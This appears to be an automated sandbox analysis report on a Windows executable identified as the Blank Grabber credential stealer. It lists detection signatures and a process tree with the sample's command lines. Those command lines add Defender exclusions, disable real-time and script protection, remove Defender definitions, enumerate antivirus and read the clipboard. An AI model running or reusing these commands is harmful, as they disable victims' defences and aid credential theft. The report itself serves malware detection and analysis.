Edit tour
Windows
Analysis Report
Built (1).exe
Overview
General Information
Detection
Blank Grabber
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
- Built (1).exe (PID: 7528 cmdline:
"C:\Users\ user\Deskt op\Built ( 1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D) - Built (1).exe (PID: 7544 cmdline:
"C:\Users\ user\Deskt op\Built ( 1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D) - cmd.exe (PID: 7596 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\D esktop\Bui lt (1).exe '" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7680 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\Des ktop\Built (1).exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7604 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7700 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) - MpCmdRun.exe (PID: 7628 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 7692 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Pr ogramData\ Microsoft\ Windows\St art Menu\P rograms\St artUp\ . scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7764 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Prog ramData\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tUp\ .sc r' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7948 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 8168 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7964 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6032 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - conhost.exe (PID: 8004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8088 cmdline:
C:\Windows \system32\ cmd.exe /c "WMIC /No de:localho st /Namesp ace:\\root \SecurityC enter2 Pat h Antiviru sProduct G et display Name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 4192 cmdline:
WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntivirusP roduct Get displayNa me MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8104 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Cli pboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5264 cmdline:
powershell Get-Clipb oard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8128 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7252 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)